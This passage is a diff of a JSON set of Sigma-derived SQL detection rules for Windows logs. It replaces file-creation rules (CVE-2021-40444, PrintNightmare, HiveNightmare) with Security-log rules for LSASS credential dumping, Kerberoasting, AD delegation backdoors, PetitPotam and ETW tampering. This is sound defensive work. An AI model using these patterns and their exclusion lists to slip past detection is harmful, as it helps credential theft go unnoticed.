"60c0a111-787a-4e8a-9262-ee485f3ef9d5", - "status": "experimental", - "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", - "author": "Florian Roth (Nextron Systems), Sittikorn S", + "title": "HybridConnectionManager Service Running", + "id": "b55d23e5-6821-44ff-8a6e-67218891e49f", + "status": "test", + "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.resource_development", - "attack.t1587" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Hybrid Connection Manager via Azure function apps." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\INetCache%' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.inf%' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%AppData\\\\Local\\\\Temp%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Content.inf' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-ServiceBus-Client' AND EventID IN ('40300', '40301', '40302') AND (logs MATCH ('\"HybridConnection\" OR \"sb://\" OR \"servicebus.windows.net\" OR \"HybridConnectionManage\"')))" ], - "filename": "file_event_win_winword_cve_2021_40444.yml" + "filename": "win_hybridconnectionmgr_svc_running.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern", - "id": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", - "status": "test", - "description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", - "author": "Florian Roth (Nextron Systems)", + "title": "Loading Diagcab Package From Remote Path", + "id": "50cb47b8-2c33-4b23-a2e9-4600657d9746", + "status": "experimental", + "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.resource_development", - "attack.t1587", - "cve.2021.1675" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate package hosted on a known and authorized remote location" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\old\\\\1\\\\123%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '101' AND PackagePath LIKE '%\\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "file_event_win_cve_2021_1675_printspooler.yml" + "filename": "win_diagnosis_scripted_load_remote_diagcab.yml" }, { - "title": "Windows Shell File Write to Suspicious Folder", - "id": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", - "status": "experimental", - "description": "Detects a Windows executable that writes files to suspicious folders", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Outbound Kerberos Connection - Security", + "id": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", + "status": "test", + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "author": "Ilyas Ochkov, oscd.community", + "tags": [ + "attack.lateral_movement", + "attack.t1558.003" + ], "falsepositives": [ - "Unknown" + "Web Browsers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\Public%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs%' ESCAPE '\\')) OR ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\') AND (TargetFilename LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND DestPort = '88') AND NOT (((Application LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" ], - "filename": "file_event_win_shell_write_susp_directory.yml" + "filename": "win_security_susp_outbound_kerberos_connection.yml" }, { - "title": "Powerup Write Hijack DLL", - "id": "602a1f13-c640-4d73-b053-be9a2fa58b96", - "status": "test", - "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n", - "author": "Subhash Popuri (@pbssubhash)", + "title": "Generic Password Dumper Activity on LSASS", + "id": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", + "status": "experimental", + "description": "Detects process handle on LSASS process with certain access mask", + "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.001" + "attack.credential_access", + "car.2019-04-004", + "attack.t1003.001" ], "falsepositives": [ - "Any powershell script that creates bat files" + "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.bat' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4656' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessMask LIKE '%0x40%' ESCAPE '\\' OR AccessMask LIKE '%0x1400%' ESCAPE '\\' OR AccessMask LIKE '%0x100000%' ESCAPE '\\' OR AccessMask LIKE '%0x1410%' ESCAPE '\\' OR AccessMask LIKE '%0x1010%' ESCAPE '\\' OR AccessMask LIKE '%0x1438%' ESCAPE '\\' OR AccessMask LIKE '%0x143a%' ESCAPE '\\' OR AccessMask LIKE '%0x1418%' ESCAPE '\\' OR AccessMask LIKE '%0x1f0fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f1fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f2fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f3fff%' ESCAPE '\\')) OR (EventID = '4663' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessList LIKE '%4484%' ESCAPE '\\' OR AccessList LIKE '%4416%' ESCAPE '\\'))) AND NOT (((ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\minionhost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\VsTskMgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\GamingServices.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MRT.exe' ESCAPE '\\' OR ProcessName LIKE '%RtkAudUService64' ESCAPE '\\') AND (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWow64\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysNative\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\taskhostw.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\aurora\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE '%\\\\x64\\\\SCENARIOENGINE.EXE' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND ProcessName LIKE '%\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\')))" ], - "filename": "file_event_win_hktl_powerup_dllhijacking.yml" + "filename": "win_security_susp_lsass_dump_generic.yml" }, { - "title": "Created Files by Office Applications", - "id": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", - "status": "experimental", - "description": "This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "title": "Weak Encryption Enabled and Kerberoast", + "id": "f6de9536-0441-4b3f-a646-f4e00f300ffd", + "status": "test", + "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", + "author": "@neu5ron", "tags": [ - "attack.t1204.002", - "attack.execution" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.proj' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WebServiceCache\\\\AllUsers%' ESCAPE '\\' AND TargetFilename LIKE '%.com' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\webexdelta\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\assembly\\\\tmp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4738' AND ((((NewUacValue LIKE '%8___' ESCAPE '\\' OR NewUacValue LIKE '%9___' ESCAPE '\\' OR NewUacValue LIKE '%A___' ESCAPE '\\' OR NewUacValue LIKE '%B___' ESCAPE '\\' OR NewUacValue LIKE '%C___' ESCAPE '\\' OR NewUacValue LIKE '%D___' ESCAPE '\\' OR NewUacValue LIKE '%E___' ESCAPE '\\' OR NewUacValue LIKE '%F___' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8___' ESCAPE '\\' OR OldUacValue LIKE '%9___' ESCAPE '\\' OR OldUacValue LIKE '%A___' ESCAPE '\\' OR OldUacValue LIKE '%B___' ESCAPE '\\' OR OldUacValue LIKE '%C___' ESCAPE '\\' OR OldUacValue LIKE '%D___' ESCAPE '\\' OR OldUacValue LIKE '%E___' ESCAPE '\\' OR OldUacValue LIKE '%F___' ESCAPE '\\'))) OR ((NewUacValue LIKE '%1____' ESCAPE '\\' OR NewUacValue LIKE '%3____' ESCAPE '\\' OR NewUacValue LIKE '%5____' ESCAPE '\\' OR NewUacValue LIKE '%7____' ESCAPE '\\' OR NewUacValue LIKE '%9____' ESCAPE '\\' OR NewUacValue LIKE '%B____' ESCAPE '\\' OR NewUacValue LIKE '%D____' ESCAPE '\\' OR NewUacValue LIKE '%F____' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%1____' ESCAPE '\\' OR OldUacValue LIKE '%3____' ESCAPE '\\' OR OldUacValue LIKE '%5____' ESCAPE '\\' OR OldUacValue LIKE '%7____' ESCAPE '\\' OR OldUacValue LIKE '%9____' ESCAPE '\\' OR OldUacValue LIKE '%B____' ESCAPE '\\' OR OldUacValue LIKE '%D____' ESCAPE '\\' OR OldUacValue LIKE '%F____' ESCAPE '\\')))) OR ((NewUacValue LIKE '%8__' ESCAPE '\\' OR NewUacValue LIKE '%9__' ESCAPE '\\' OR NewUacValue LIKE '%A__' ESCAPE '\\' OR NewUacValue LIKE '%B__' ESCAPE '\\' OR NewUacValue LIKE '%C__' ESCAPE '\\' OR NewUacValue LIKE '%D__' ESCAPE '\\' OR NewUacValue LIKE '%E__' ESCAPE '\\' OR NewUacValue LIKE '%F__' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8__' ESCAPE '\\' OR OldUacValue LIKE '%9__' ESCAPE '\\' OR OldUacValue LIKE '%A__' ESCAPE '\\' OR OldUacValue LIKE '%B__' ESCAPE '\\' OR OldUacValue LIKE '%C__' ESCAPE '\\' OR OldUacValue LIKE '%D__' ESCAPE '\\' OR OldUacValue LIKE '%E__' ESCAPE '\\' OR OldUacValue LIKE '%F__' ESCAPE '\\')))))" ], - "filename": "file_event_win_script_creation_by_office_using_file_ext.yml" + "filename": "win_security_alert_enable_weak_encryption.yml" }, { - "title": "Suspicious File Creation In Uncommon AppData Folder", - "id": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", - "status": "experimental", - "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Enabled User Right in AD to Control User Objects", + "id": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", + "status": "test", + "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", + "author": "@neu5ron", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.psm1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\LocalLow\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4704' AND PrivilegeList LIKE '%SeEnableDelegationPrivilege%' ESCAPE '\\')" ], - "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml" + "filename": "win_security_alert_active_directory_user_control.yml" }, { - "title": "Potential Remote Credential Dumping Activity", - "id": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", - "status": "experimental", - "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", - "author": "SecurityAura", + "title": "Password Dumper Activity on LSASS", + "id": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", + "status": "test", + "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", + "author": "sigma", "tags": [ "attack.credential_access", - "attack.t1003" + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename REGEXP '\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND AccessMask = '0x705' AND ObjectType LIKE 'SAM\\_DOMAIN' ESCAPE '\\')" ], - "filename": "file_event_win_remote_cred_dump.yml" + "filename": "win_security_susp_lsass_dump.yml" }, { - "title": "Suspicious DotNET CLR Usage Log Artifact", - "id": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", - "status": "experimental", - "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.", - "author": "frack113, omkar72, oscd.community, Wojciech Lesicki", + "title": "ETW Logging Disabled In .NET Processes - Registry", + "id": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", + "status": "test", + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1112", + "attack.t1562" ], "falsepositives": [ - "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\UsageLogs\\\\cmstp.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\cscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\mshta.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\msxsl.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\regsvr32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\rundll32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\svchost.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wmic.exe.log' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\MsiExec.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% -Embedding%' ESCAPE '\\' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%Temp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework' ESCAPE '\\' AND ObjectValueName = 'ETWEnabled' AND NewValue = '0') OR (EventID = '4657' AND ObjectName LIKE '%\\\\Environment%' ESCAPE '\\' AND (ObjectValueName LIKE 'COMPlus\\_ETWEnabled' ESCAPE '\\' OR ObjectValueName LIKE 'COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue = '0')))" ], - "filename": "file_event_win_net_cli_artefact.yml" + "filename": "win_security_dot_net_etw_tamper.yml" }, { - "title": "Potential DCOM InternetExplorer.Application DLL Hijack", - "id": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", + "title": "SMB Create Remote File Admin Share", + "id": "b210394c-ba12-4f89-9117-44a2464b9511", "status": "test", - "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", "tags": [ "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image = 'System' AND TargetFilename LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '%C$' ESCAPE '\\' AND AccessMask = '0x2') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_dcom_iertutil_dll_hijack.yml" + "filename": "win_security_smb_file_creation_admin_shares.yml" }, { - "title": "Suspicious Desktopimgdownldr Target File", - "id": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", + "title": "Active Directory User Backdoors", + "id": "300bac00-e041-4ee2-9c36-e262656a6ecc", "status": "test", - "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", + "author": "@neu5ron", "tags": [ - "attack.defense_evasion", - "attack.t1105" + "attack.t1098", + "attack.persistence" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Personalization\\\\LockScreenImage\\\\%' ESCAPE '\\') AND NOT (TargetFilename LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%.jpg%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg%' ESCAPE '\\' OR TargetFilename LIKE '%.png%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4738' AND NOT (AllowedToDelegateTo = '-' OR AllowedToDelegateTo = '')) OR ((EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToDelegateTo') OR (EventID = '5136' AND ObjectClass = 'user' AND AttributeLDAPDisplayName = 'servicePrincipalName') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToActOnBehalfOfOtherIdentity'))))" ], - "filename": "file_event_win_susp_desktopimgdownldr_file.yml" + "filename": "win_security_alert_ad_user_backdoors.yml" }, { - "title": "PowerShell Profile Modification", - "id": "b5b78988-486d-4a80-b991-930eff3ff8bf", + "title": "T1047 Wmiprvse Wbemcomn DLL Hijack", + "id": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", "status": "test", - "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", - "author": "HieuTT35, Nasreddine Bencherchali", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.013" + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "System administrator creating Powershell profile manually" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\Microsoft.PowerShell\\_profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WindowsPowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Program Files\\\\PowerShell\\\\7\\\\profile.ps1' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_powershell_profile.yml" + "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "Typical HiveNightmare SAM File Export", - "id": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", - "status": "test", - "description": "Detects files written by the different tools that exploit HiveNightmare", - "author": "Florian Roth (Nextron Systems)", + "title": "PetitPotam Suspicious Kerberos TGT Request", + "id": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", + "status": "experimental", + "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", + "author": "Mauricio Velazco, Michael Haag", "tags": [ "attack.credential_access", - "attack.t1552.001", - "cve.2021.36934" + "attack.t1187" ], "falsepositives": [ - "Files that accidentally contain these strings" + "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2021-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2022-%' ESCAPE '\\' OR 